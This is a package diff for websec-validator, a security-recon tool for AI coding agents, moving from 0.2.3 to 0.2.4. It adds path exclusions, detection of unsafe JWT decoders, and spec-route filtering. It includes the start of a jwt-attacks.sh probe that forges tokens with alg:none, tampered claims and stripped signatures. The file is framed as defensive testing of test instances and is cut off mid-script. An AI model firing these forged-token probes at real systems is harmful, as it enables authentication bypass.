websec-validator 0.2.3__tar.gz → 0.2.4__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (59)
  1. {websec_validator-0.2.3/src/websec_validator.egg-info → websec_validator-0.2.4}/PKG-INFO +1 -1
  2. {websec_validator-0.2.3 → websec_validator-0.2.4}/pyproject.toml +1 -1
  3. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/briefing.py +1 -0
  4. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/cli.py +7 -2
  5. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/__init__.py +2 -2
  6. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/authz.py +16 -0
  7. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/base.py +8 -1
  8. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/routes.py +49 -18
  9. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/findings.py +14 -0
  10. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/recon.py +2 -2
  11. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/report.py +7 -3
  12. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/scanners.py +13 -8
  13. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/bola-cross-tenant.sh +2 -1
  14. websec_validator-0.2.4/src/websec_validator/templates/probes/jwt-attacks.sh +61 -0
  15. websec_validator-0.2.4/src/websec_validator/templates/probes/ssrf-probes.sh +62 -0
  16. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/unauth-baseline.sh +2 -1
  17. {websec_validator-0.2.3 → websec_validator-0.2.4/src/websec_validator.egg-info}/PKG-INFO +1 -1
  18. {websec_validator-0.2.3 → websec_validator-0.2.4}/tests/test_recon.py +37 -1
  19. websec_validator-0.2.3/src/websec_validator/templates/probes/jwt-attacks.sh +0 -161
  20. websec_validator-0.2.3/src/websec_validator/templates/probes/ssrf-probes.sh +0 -189
  21. {websec_validator-0.2.3 → websec_validator-0.2.4}/LICENSE +0 -0
  22. {websec_validator-0.2.3 → websec_validator-0.2.4}/README.md +0 -0
  23. {websec_validator-0.2.3 → websec_validator-0.2.4}/setup.cfg +0 -0
  24. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/__init__.py +0 -0
  25. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/calibration.json +0 -0
  26. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/calibration.py +0 -0
  27. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/constitution.py +0 -0
  28. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/corpus.json +0 -0
  29. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/dynamic.py +0 -0
  30. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/auth.py +0 -0
  31. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/client_exposure.py +0 -0
  32. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/graphql.py +0 -0
  33. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/iac_ci.py +0 -0
  34. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/integrations.py +0 -0
  35. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/schemas.py +0 -0
  36. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/stack.py +0 -0
  37. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/surface.py +0 -0
  38. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/extractors/tenant.py +0 -0
  39. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/probes.py +0 -0
  40. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/proof.py +0 -0
  41. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/_lib.py +0 -0
  42. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/bola-write-verbs.py +0 -0
  43. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/compare-roles.sh +0 -0
  44. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/dlp-bypass-offline.py +0 -0
  45. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/hs256-brute-force.py +0 -0
  46. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/mass-assignment.py +0 -0
  47. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/race-conditions.py +0 -0
  48. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/rate-limit-burst.sh +0 -0
  49. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/s3-assess.sh +0 -0
  50. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/probes/webhook-forgery.py +0 -0
  51. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/reports/FINDINGS-SUMMARY.md.template +0 -0
  52. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/reports/access-control-matrix.md.template +0 -0
  53. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/reports/findings-triage.md.template +0 -0
  54. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/reports/pentest-handover-brief.md.template +0 -0
  55. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator/templates/reports/per-tool-FINDINGS.md.template +0 -0
  56. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator.egg-info/SOURCES.txt +0 -0
  57. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator.egg-info/dependency_links.txt +0 -0
  58. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator.egg-info/entry_points.txt +0 -0
  59. {websec_validator-0.2.3 → websec_validator-0.2.4}/src/websec_validator.egg-info/top_level.txt +0 -0
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: websec-validator
3
- Version: 0.2.3
3
+ Version: 0.2.4
4
4
  Summary: Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app.
5
5
  Author: Ricardo Accioly
6
6
  License: MIT
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
4
4
 
5
5
  [project]
6
6
  name = "websec-validator"
7
- version = "0.2.3"
7
+ version = "0.2.4"
8
8
  description = "Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app."
9
9
  readme = "README.md"
10
10
  requires-python = ">=3.11"
@@ -118,6 +118,7 @@ credentials** — ask the human, never fabricate, never hit production.
118
118
  - **Datastores:** {", ".join(stack.get("datastores", [])) or "?"} · **Monorepo:** {stack.get("monorepo", False)}
119
119
  - **Auth scheme:** `{auth.get("scheme","?")}` (token in {auth.get("token_location","?")}) · guard files: {len(auth.get("guard_files", []))}
120
120
  - **Route engine:** {routes.get("engine","?")} · **{routes.get('count',0)} endpoints** · by method: {routes.get("by_method", {})}
121
+ {("> " + routes["note"]) if routes.get("note") else ""}
121
122
 
122
123
  ## 2. ★ Tenant boundary (confirm first — highest value, easiest to get wrong)
123
124
 
@@ -87,7 +87,7 @@ def cmd_run(args) -> int:
87
87
  print(f"websec-validator v{__version__} · target: {target} · run {ts}\n")
88
88
 
89
89
  # 1. recon
90
- facts = recon.build_facts(target, __version__)
90
+ facts = recon.build_facts(target, __version__, args.exclude)
91
91
  recon.write_facts(facts, out / "FACTS.json")
92
92
  langs = facts["stack"]["languages"]
93
93
  _print_facts_summary(facts)
@@ -98,7 +98,8 @@ def cmd_run(args) -> int:
98
98
  unified = None
99
99
  if args.scan:
100
100
  print("\n running available static scanners (read-only)…")
101
- scan_results = scanners.run_available(target, out, langs)
101
+ only = args.scanners.split(",") if args.scanners else None
102
+ scan_results = scanners.run_available(target, out, langs, excludes=args.exclude, only=only)
102
103
  for r in scan_results:
103
104
  tag = r.get("findings", r.get("status", "?"))
104
105
  print(f" {r['name']}: {tag}")
@@ -342,6 +343,10 @@ def build_parser() -> argparse.ArgumentParser:
342
343
  r.add_argument("target")
343
344
  r.add_argument("--scan", action="store_true", help="also execute available static scanners")
344
345
  r.add_argument("--out", help="output dir (default: ./websec-out)")
346
+ r.add_argument("--exclude", action="append", metavar="PATH",
347
+ help="exclude a path/glob from recon + scanners (repeatable; e.g. --exclude 'docs/**')")
348
+ r.add_argument("--scanners", metavar="A,B",
349
+ help="comma-separated subset of scanners to run with --scan (e.g. gitleaks,semgrep)")
345
350
  r.set_defaults(func=cmd_run)
346
351
 
347
352
  # recon/proof/calibrate are hidden from the main --help (argparse.SUPPRESS): recon is a
@@ -39,9 +39,9 @@ REGISTRY: list[Extractor] = [
39
39
  ]
40
40
 
41
41
 
42
- def run_all(root: Path, version: str) -> dict:
42
+ def run_all(root: Path, version: str, excludes: list | None = None) -> dict:
43
43
  """Walk the repo once, run every extractor, return the merged FACTS dict."""
44
- ctx = RepoContext(root)
44
+ ctx = RepoContext(root, excludes)
45
45
  facts: dict = {
46
46
  "tool": "websec-validator",
47
47
  "version": version,
@@ -52,6 +52,14 @@ ROLE = re.compile(
52
52
  r"has_?[Rr]ole\s*\(\s*['\"]([\w:.-]+)['\"]|"
53
53
  r"authorizeRoles\s*\(([^)]*)\)|permission_required\s*\(\s*['\"]([\w:.-]+)['\"]")
54
54
 
55
+ # F5: a call to a decoder/parser named "unsafe"/"unverified"/"noVerify"/"skipVerify"
56
+ # (e.g. decodeJwtPayloadUnsafe) — dangerous when its result feeds an auth decision.
57
+ UNSAFE_DECODER = re.compile(r"\b([A-Za-z_]\w*(?:[Uu]nsafe|[Uu]nverified|[Nn]o[Vv]erif\w*|[Ss]kip[Vv]erif\w*)\w*)\s*\(")
58
+ # does this file actually make an auth/identity decision? (so the unsafe decode matters)
59
+ AUTH_CONTEXT = re.compile(
60
+ r"require(?:Auth|Admin|Role|Permission)|isAdmin|authoriz|getToken\s*\(|getServerSession|"
61
+ r"req\.auth\b|currentUser|jwt\.(?:decode|verify)|decodeJwt", re.I)
62
+
55
63
 
56
64
  def _parse_next_middleware(ctx: RepoContext) -> dict:
57
65
  # Next 15.5+/16 renamed `middleware.ts` → `proxy.ts` (both filenames are valid; the
@@ -127,6 +135,13 @@ class AuthzExtractor(Extractor):
127
135
  if e.get("method") in WRITE_VERBS and not PUBLIC_HINT.search(e.get("path", "")):
128
136
  no_guard_writes.append(f"{e['method']} {e['path']} ({relcp or '?'})")
129
137
 
138
+ # F5: files that make an auth decision AND call an unsafe/unverified decoder
139
+ unsafe_decoders = []
140
+ for _p, rel, text in ctx.iter_code():
141
+ if AUTH_CONTEXT.search(text):
142
+ for dec in sorted(set(UNSAFE_DECODER.findall(text))):
143
+ unsafe_decoders.append({"file": rel, "decoder": dec})
144
+
130
145
  if global_auth:
131
146
  where = f"`{mw['file']}` (matcher {mw.get('matchers') or '—'})" if mw_auth else "`app.use(<auth>)`"
132
147
  note = (f"A GLOBAL auth middleware ({where}) was detected — most routes are protected by default. "
@@ -146,5 +161,6 @@ class AuthzExtractor(Extractor):
146
161
  "no_visible_guard": no_guard, "unknown": unknown},
147
162
  "endpoint_guards": egs[:400],
148
163
  "write_endpoints_without_visible_guard": sorted(set(no_guard_writes))[:60],
164
+ "unsafe_auth_decoders": unsafe_decoders[:30],
149
165
  "note": note,
150
166
  }
@@ -9,6 +9,7 @@ still say something useful.
9
9
 
10
10
  from __future__ import annotations
11
11
 
12
+ import fnmatch
12
13
  from pathlib import Path
13
14
 
14
15
  SKIP_DIRS = {".git", "node_modules", "dist", "build", ".next", ".nuxt", "venv",
@@ -27,13 +28,17 @@ MAX_BYTES = 2_000_000
27
28
  class RepoContext:
28
29
  """Walk the tree once; cache file text; serve cheap queries to every extractor."""
29
30
 
30
- def __init__(self, root: Path):
31
+ def __init__(self, root: Path, excludes: list | None = None):
31
32
  self.root = root
33
+ self.excludes = [e for e in (excludes or []) if e] # user --exclude paths/globs
32
34
  self._text: dict[Path, str] = {}
33
35
  self.code_files: list[Path] = []
34
36
  self.stack: dict = {} # filled by StackExtractor, read by the rest
35
37
  self._walk()
36
38
 
39
+ def _excluded(self, rel: str) -> bool:
40
+ return any(ex in rel or fnmatch.fnmatch(rel, ex) for ex in self.excludes)
41
+
37
42
  def _walk(self) -> None:
38
43
  n = 0
39
44
  for p in self.root.rglob("*"):
@@ -44,6 +49,8 @@ class RepoContext:
44
49
  # have its whole tree skipped.
45
50
  if p.is_dir() or any(part in SKIP_DIRS for part in p.relative_to(self.root).parts):
46
51
  continue
52
+ if self.excludes and self._excluded(str(p.relative_to(self.root))):
53
+ continue
47
54
  if p.suffix.lower() in CODE_EXT:
48
55
  self.code_files.append(p)
49
56
  n += 1
@@ -38,6 +38,20 @@ TRAVERSAL_NAMES = re.compile(r"^(file|filename|filepath|path|dir|folder|template
38
38
  TEMPLATED = ("BASE_URL", "localhost", "127.0.0.1", "${", "{{")
39
39
  ASSET_GLOB = re.compile(r"\*\.\w+")
40
40
 
41
+ # A route whose source file is a vendored/third-party API SPEC (OpenAPI/Swagger/GraphQL
42
+ # schema), not an app handler. Noir parses these and emits their paths as if the app
43
+ # served them — which on a repo that vendors e.g. a 16k-line swagger turns ~15 real
44
+ # findings into hundreds of phantom ones. We split these out as informational.
45
+ SPEC_PATH = re.compile(
46
+ r"\.(?:ya?ml|graphql|gql|raml)$" # spec file formats
47
+ r"|(?:^|/)(?:node_modules|vendor|vendored|third[_-]?party|examples?|schemas?"
48
+ r"|(?:docs?|documentation)[\w-]*)/" # vendor/docs/schema dirs
49
+ r"|swagger|openapi", re.I)
50
+
51
+
52
+ def _is_spec_derived(code_path: str) -> bool:
53
+ return bool(code_path) and bool(SPEC_PATH.search(code_path))
54
+
41
55
 
42
56
  def _clean_path(p: str) -> str:
43
57
  p = re.sub(r":(\w+)", r"{\1}", p) # Express :id -> {id}
@@ -53,16 +67,17 @@ def _is_noise(path: str) -> bool:
53
67
  return bool(ASSET_GLOB.search(path)) # static-asset glob route (/*.png)
54
68
 
55
69
 
56
- def _noir_scan(root: Path) -> list | None:
70
+ def _noir_scan(root: Path, extra_excludes: list | None = None) -> list | None:
57
71
  """Run Noir → list of endpoint dicts, or None if Noir unavailable/failed."""
58
72
  if not shutil.which("noir"):
59
73
  return None
74
+ excl = EXCLUDE_GLOBS + ("," + ",".join(extra_excludes) if extra_excludes else "")
60
75
  with tempfile.NamedTemporaryFile(suffix=".json", delete=False) as tf:
61
76
  out = Path(tf.name)
62
77
  try:
63
78
  proc = subprocess.run(
64
79
  ["noir", "scan", str(root), "-f", "json", "-o", str(out),
65
- "--exclude-path", EXCLUDE_GLOBS, "--no-log", "--no-color"],
80
+ "--exclude-path", excl, "--no-log", "--no-color"],
66
81
  capture_output=True, text=True, timeout=300)
67
82
  if not out.exists():
68
83
  return None
@@ -77,8 +92,10 @@ def _noir_scan(root: Path) -> list | None:
77
92
  pass
78
93
 
79
94
 
80
- def _normalize_noir(eps: list) -> list:
81
- rows, seen = [], set()
95
+ def _normalize_noir(eps: list) -> tuple:
96
+ """→ (app_routes, spec_derived_routes). Routes whose source file is a vendored API
97
+ spec are split out so they don't generate phantom findings (B1)."""
98
+ rows, spec, seen = [], [], set()
82
99
  for e in eps:
83
100
  if e.get("internal"):
84
101
  continue
@@ -89,21 +106,22 @@ def _normalize_noir(eps: list) -> list:
89
106
  if _is_noise(path):
90
107
  continue
91
108
  method = (e.get("method") or "GET").upper()
92
- if (method, path) in seen:
93
- continue
94
- seen.add((method, path))
95
- params = [{"name": p.get("name", ""), "where": p.get("param_type", "")}
96
- for p in (e.get("params") or [])]
97
109
  cp = (e.get("details", {}) or {}).get("code_paths") or [{}]
98
- rows.append({
110
+ code_path = cp[0].get("path", "")
111
+ if (method, path, code_path) in seen:
112
+ continue
113
+ seen.add((method, path, code_path))
114
+ row = {
99
115
  "method": method,
100
116
  "path": path,
101
- "params": params,
117
+ "params": [{"name": p.get("name", ""), "where": p.get("param_type", "")}
118
+ for p in (e.get("params") or [])],
102
119
  "technology": (e.get("details", {}) or {}).get("technology", ""),
103
- "code_path": cp[0].get("path", ""),
120
+ "code_path": code_path,
104
121
  "source": "noir",
105
- })
106
- return rows
122
+ }
123
+ (spec if _is_spec_derived(code_path) else rows).append(row)
124
+ return rows, spec
107
125
 
108
126
 
109
127
  # ---- regex fallback (only when Noir is absent) ---------------------------------------------
@@ -193,19 +211,23 @@ class RoutesExtractor(Extractor):
193
211
  category = "surface"
194
212
 
195
213
  def extract(self, ctx: RepoContext, facts: dict) -> dict:
196
- eps = _noir_scan(ctx.root)
214
+ eps = _noir_scan(ctx.root, getattr(ctx, "excludes", None))
197
215
  if eps is not None:
198
- routes = _normalize_noir(eps)
216
+ routes, spec_derived = _normalize_noir(eps)
199
217
  engine = "noir"
200
218
  else:
201
- routes = _fallback(ctx)
219
+ routes, spec_derived = _fallback(ctx), []
202
220
  engine = "regex-fallback (install OWASP Noir for full coverage: brew install noir)"
221
+ # honor user --exclude against route code_paths too (Noir's own --exclude-path glob is
222
+ # unreliable for bare dir names; this guarantees `--exclude <path>` drops those routes).
223
+ if getattr(ctx, "excludes", None):
224
+ routes = [r for r in routes if not ctx._excluded(r.get("code_path", ""))]
203
225
  by_method: dict = {}
204
226
  by_tech: dict = {}
205
227
  for r in routes:
206
228
  by_method[r["method"]] = by_method.get(r["method"], 0) + 1
207
229
  by_tech[r["technology"]] = by_tech.get(r["technology"], 0) + 1
208
- return {
230
+ out = {
209
231
  "engine": engine,
210
232
  "count": len(routes),
211
233
  "by_method": by_method,
@@ -213,3 +235,12 @@ class RoutesExtractor(Extractor):
213
235
  "endpoints": routes,
214
236
  "targeting": _derive(routes),
215
237
  }
238
+ if spec_derived:
239
+ from collections import Counter
240
+ srcs = Counter(r["code_path"] for r in spec_derived)
241
+ out["spec_derived_excluded"] = len(spec_derived)
242
+ out["spec_derived_sources"] = [f"{n}× {f}" for f, n in srcs.most_common(8)]
243
+ out["note"] = (f"⚠ {len(spec_derived)} routes came from vendored API SPEC files "
244
+ f"(OpenAPI/Swagger/GraphQL), not app handlers — EXCLUDED from the {len(routes)} "
245
+ f"app routes + all findings. Sources: {', '.join(f for f, _ in srcs.most_common(5))}.")
246
+ return out
@@ -26,6 +26,9 @@ from . import calibration
26
26
  STANDARDS = {
27
27
  "missing-auth": (["CWE-862 Missing Authorization", "CWE-306 Missing Authentication"],
28
28
  "ASVS V4.1.1", ["API1:2023 BOLA", "API5:2023 BFLA"]),
29
+ "unsafe-auth-decoder": (["CWE-347 Improper Verification of Cryptographic Signature",
30
+ "CWE-345 Insufficient Verification of Data Authenticity"],
31
+ "ASVS V3.5.2", ["API2:2023 Broken Authentication"]),
29
32
  "bola": (["CWE-639 Authorization Bypass (IDOR)"], "ASVS V4.2.1", ["API1:2023 BOLA"]),
30
33
  "ssrf": (["CWE-918 SSRF"], "ASVS V12.6", ["API7:2023 SSRF"]),
31
34
  "secret": (["CWE-798 Hard-coded Credentials"], "ASVS V2.10", ["API8:2023 Misconfiguration"]),
@@ -48,6 +51,9 @@ REMEDIATION = {
48
51
  "missing-auth": "Add an auth guard to the handler (e.g. requireAuth()/getServerSession()), or a "
49
52
  "middleware matcher over /api/(.*) with an explicit public allowlist so it can't be forgotten.",
50
53
  "bola": "Enforce object ownership: verify the authenticated principal owns/can access the resource id (tenant scope).",
54
+ "unsafe-auth-decoder": "Verify the token/signature before trusting it for an auth/identity decision — use a "
55
+ "verifying decode (e.g. jwt.verify with the key / a checked session), never an *Unsafe* "
56
+ "or decode-only path whose output then feeds requireAuth/requireAdmin.",
51
57
  "ssrf": "Validate + allowlist outbound URLs; block RFC1918/IMDS/file://; never fetch a raw user-supplied URL.",
52
58
  "secret": "Rotate the credential, remove from code/history, load from a secrets manager.",
53
59
  "cve": "Upgrade the dependency to the fixed version.",
@@ -150,6 +156,14 @@ def build_ledger(facts: dict, unified: dict | None, dynamic: dict | None = None,
150
156
  [{"layer": "dynamic", "detail": f"cross-tenant GET returned another tenant's data "
151
157
  f"(HTTP {lk.get('status')}, {lk.get('direction')})"}]))
152
158
 
159
+ # ---- 1c. Unsafe/unverified decoder feeding an auth decision (F5) ----
160
+ for ud in ((facts.get("authz", {}) or {}).get("unsafe_auth_decoders", []) or []):
161
+ out.append(_f(f"Auth decision uses an unverified decoder: {ud.get('decoder')}", "access-control",
162
+ "unsafe-auth-decoder", "HIGH", "MEDIUM", ud.get("file", ""),
163
+ [{"layer": "recon", "detail": f"{ud.get('file')} makes an auth/identity decision AND calls "
164
+ f"{ud.get('decoder')}() — if that decodes a token/signature WITHOUT verifying it, a forged "
165
+ "value is trusted (the decodeJwtPayloadUnsafe → requireAdmin class of bug). Trace the call path."}]))
166
+
153
167
  # ---- 2. Static scanner findings (de-duplicated `unified`) ----
154
168
  cat_to_class = {"sca": "cve", "secret": "secret", "iac": "iac", "sast": "sast"}
155
169
  for t in (unified or {}).get("top", []):
@@ -14,8 +14,8 @@ from .extractors.base import RepoContext
14
14
  from .extractors.stack import StackExtractor
15
15
 
16
16
 
17
- def build_facts(root: Path, version: str) -> dict:
18
- return extractors.run_all(root, version)
17
+ def build_facts(root: Path, version: str, excludes: list | None = None) -> dict:
18
+ return extractors.run_all(root, version, excludes)
19
19
 
20
20
 
21
21
  def write_facts(facts: dict, out: Path) -> Path:
@@ -43,8 +43,12 @@ def render(facts: dict, scanners: dict, scan_results: list, unified: dict | None
43
43
  chain = " → ".join(e["layer"] for e in f["evidence"])
44
44
  api = (" · " + ", ".join(f["standards"]["owasp_api"])) if f["standards"]["owasp_api"] else ""
45
45
  cal = f.get("calibrated") or {}
46
- calstr = (f" · P(real)≈**{cal.get('p')}** CI {cal.get('ci')} (n={cal.get('n')}, {cal.get('basis')})"
47
- if cal else "")
46
+ if not cal:
47
+ calstr = ""
48
+ elif cal.get("n", 0) == 0 or str(cal.get("basis", "")).startswith("prior"):
49
+ calstr = " · P(real): _uncalibrated — verify manually_" # don't dress n=0 as a measurement (B4)
50
+ else:
51
+ calstr = f" · P(real)≈**{cal.get('p')}** CI {cal.get('ci')} (n={cal.get('n')}, {cal.get('basis')})"
48
52
  _ll.append(f"- **[{f['severity']}/{f['confidence']}]** {f['title']} \n"
49
53
  f" `{f['location']}` · evidence: {chain} · {cwe}{api}{calstr} \n"
50
54
  f" _fix:_ {f['remediation']}")
@@ -68,7 +72,7 @@ def render(facts: dict, scanners: dict, scan_results: list, unified: dict | None
68
72
  | | |
69
73
  |---|---|
70
74
  | Stack | {", ".join(stack.get("languages", [])) or "?"} · {", ".join(stack.get("frameworks", [])) or "?"} · {", ".join(stack.get("datastores", [])) or "?"} |
71
- | Endpoints | **{routes.get('count', 0)}** (via {routes.get('engine','?').split(' ')[0]}) |
75
+ | Endpoints | **{routes.get('count', 0)}** app routes (via {routes.get('engine','?').split(' ')[0]}){(" · " + str(routes.get('spec_derived_excluded')) + " spec-derived excluded") if routes.get('spec_derived_excluded') else ""} |
72
76
  | Auth | {facts.get('auth', {}).get('scheme','?')} · roles: {', '.join(authz.get('roles_detected', [])) or 'none'} |
73
77
  | Access control | {gs.get('with_visible_guard', 0)} guarded · **{gs.get('no_visible_guard', 0)} no visible guard** · global-middleware: {authz.get('global_auth_middleware', False)} |
74
78
  | Static scanner (raw, pre-triage) | {sev_line} |
@@ -40,27 +40,27 @@ EXCLUDE_DIRS = ("websec-out", "node_modules", ".next", "dist", "build", ".git",
40
40
  "security", ".venv", "venv", "__pycache__", ".mypy_cache", "coverage")
41
41
 
42
42
 
43
- def _trivy(target: Path, out: Path) -> list:
43
+ def _trivy(target: Path, out: Path, excludes=()) -> list:
44
44
  # SCA + secrets + IaC misconfig in one pass; pinned by the user's install.
45
45
  cmd = ["trivy", "fs", "--scanners", "vuln,secret,misconfig", "--format", "json", "--output", str(out)]
46
- for d in EXCLUDE_DIRS:
46
+ for d in list(EXCLUDE_DIRS) + list(excludes):
47
47
  cmd += ["--skip-dirs", d]
48
48
  return cmd + [str(target)]
49
49
 
50
50
 
51
- def _gitleaks(target: Path, out: Path) -> list:
51
+ def _gitleaks(target: Path, out: Path, excludes=()) -> list:
52
52
  return ["gitleaks", "detect", "--source", str(target), "--no-banner",
53
53
  "--report-format", "json", "--report-path", str(out)]
54
54
 
55
55
 
56
- def _semgrep(target: Path, out: Path) -> list:
56
+ def _semgrep(target: Path, out: Path, excludes=()) -> list:
57
57
  cmd = ["semgrep", "scan", "--config", "auto", "--json", "--output", str(out)]
58
- for d in EXCLUDE_DIRS:
58
+ for d in list(EXCLUDE_DIRS) + list(excludes):
59
59
  cmd += ["--exclude", d]
60
60
  return cmd + [str(target)]
61
61
 
62
62
 
63
- def _checkov(target: Path, out: Path) -> list:
63
+ def _checkov(target: Path, out: Path, excludes=()) -> list:
64
64
  return ["checkov", "-d", str(target), "--compact", "-o", "json",
65
65
  "--output-file-path", str(out.parent)]
66
66
 
@@ -103,26 +103,31 @@ def detect(stack_languages: list | None = None) -> dict:
103
103
 
104
104
 
105
105
  def run_available(target: Path, outdir: Path, stack_languages: list | None = None,
106
- timeout: int = 600) -> list:
106
+ timeout: int = 600, excludes: list | None = None, only: list | None = None) -> list:
107
107
  """Execute every available, runnable static scanner. Returns per-scanner status.
108
108
 
109
+ `excludes`: extra paths/dirs to skip (--exclude). `only`: run just these scanner keys.
109
110
  Raw JSON lands in outdir/scanners/<key>.json. We capture status only here;
110
111
  cross-tool normalization + de-duplication is a separate (next) step.
111
112
  """
112
113
  langs = set(stack_languages or [])
114
+ excludes = excludes or []
115
+ only = set(only) if only else None
113
116
  scan_dir = outdir / "scanners"
114
117
  scan_dir.mkdir(parents=True, exist_ok=True)
115
118
  results = []
116
119
  for s in REGISTRY:
117
120
  if s.argv is None:
118
121
  continue # detect-only for now
122
+ if only is not None and s.key not in only:
123
+ continue
119
124
  if s.languages and not (set(s.languages) & langs):
120
125
  continue
121
126
  if not shutil.which(s.binary):
122
127
  continue
123
128
  out_file = scan_dir / f"{s.key}.json"
124
129
  try:
125
- proc = subprocess.run(s.argv(target, out_file), capture_output=True,
130
+ proc = subprocess.run(s.argv(target, out_file, excludes), capture_output=True,
126
131
  text=True, timeout=timeout)
127
132
  results.append({"key": s.key, "name": s.name, "category": s.category,
128
133
  "exit_code": proc.returncode, "output": str(out_file),
@@ -18,7 +18,8 @@ if [ -z "${BASE:-}" ] || [ "${BASE#FILL}" != "$BASE" ]; then echo "Set TARGET=ht
18
18
  : "${GROUP_A:?set GROUP_A=<tenant/group id of account A>}"
19
19
  : "${GROUP_B:?set GROUP_B=<tenant/group id of account B>}"
20
20
 
21
- mapfile -t PATHS < <(python3 -c "
21
+ PATHS=() # (portable; macOS bash 3.2 lacks `mapfile`)
22
+ while IFS= read -r line; do [ -n "$line" ] && PATHS+=("$line"); done < <(python3 -c "
22
23
  import json
23
24
  c = json.load(open('$ctx'))['endpoints']
24
25
  cand = c.get('idor_candidates') or [w.split(' ',1)[1] for w in c.get('writes',[]) if ' ' in w]
@@ -0,0 +1,61 @@
1
+ #!/usr/bin/env bash
2
+ # jwt-attacks.sh — manual JWT attack probe (FACTS-driven; no app-specific login).
3
+ #
4
+ # Five classic JWT attacks, run against a protected endpoint with a token YOU supply:
5
+ # 1. alg:none — if accepted, total auth bypass. 2. tampered claims + wrong HS256 sig.
6
+ # 3. expired exp. 4. stripped signature. 5. garbage token. (each should 401/403)
7
+ # Optional 6. refresh-replay-after-logout if you set REFRESH_TOKEN + the routes exist.
8
+ #
9
+ # Env (see _lib.py): TARGET, TOKEN_A=<a real JWT from a logged-in TEST account>.
10
+ # Optional: TEST_PATH=/api/some/protected/route (else picked from probe-context.json),
11
+ # REFRESH_TOKEN, LOGOUT_PATH, REFRESH_PATH. Run only against a TEST instance.
12
+ set -uo pipefail
13
+ cd "$(dirname "$0")"
14
+ ctx=probe-context.json
15
+
16
+ TARGET="${TARGET:-$(python3 -c "import json;print(json.load(open('$ctx'))['target_base_url'])" 2>/dev/null)}"
17
+ if [ -z "${TARGET:-}" ] || [ "${TARGET#FILL}" != "$TARGET" ]; then echo "Set TARGET=http://host:port (or fill probe-context.json)"; exit 2; fi
18
+ : "${TOKEN_A:?set TOKEN_A=<a real JWT from a logged-in test account>}"
19
+ ACCESS_TOKEN="$TOKEN_A"
20
+ # a protected endpoint to fire forged tokens at (override with TEST_PATH)
21
+ TEST_PATH="${TEST_PATH:-$(python3 -c "import json;c=json.load(open('$ctx'))['endpoints'];print((c.get('idor_candidates') or c.get('writes') or ['/']).__getitem__(0).split(' ',1)[-1])" 2>/dev/null)}"
22
+ TEST_URL="$TARGET${TEST_PATH:-/}"
23
+
24
+ b64url() { python3 -c "import sys,base64; sys.stdout.write(base64.urlsafe_b64encode(sys.stdin.buffer.read()).decode().rstrip('='))"; }
25
+ IFS='.' read -r H P S <<< "$ACCESS_TOKEN"
26
+ PASS_COUNT=0; FAIL_COUNT=0; FAIL_LINES=()
27
+ check() {
28
+ if [ "$3" = "$2" ]; then printf ' PASS %-28s expected:%s actual:%s\n' "$1" "$2" "$3"; PASS_COUNT=$((PASS_COUNT+1));
29
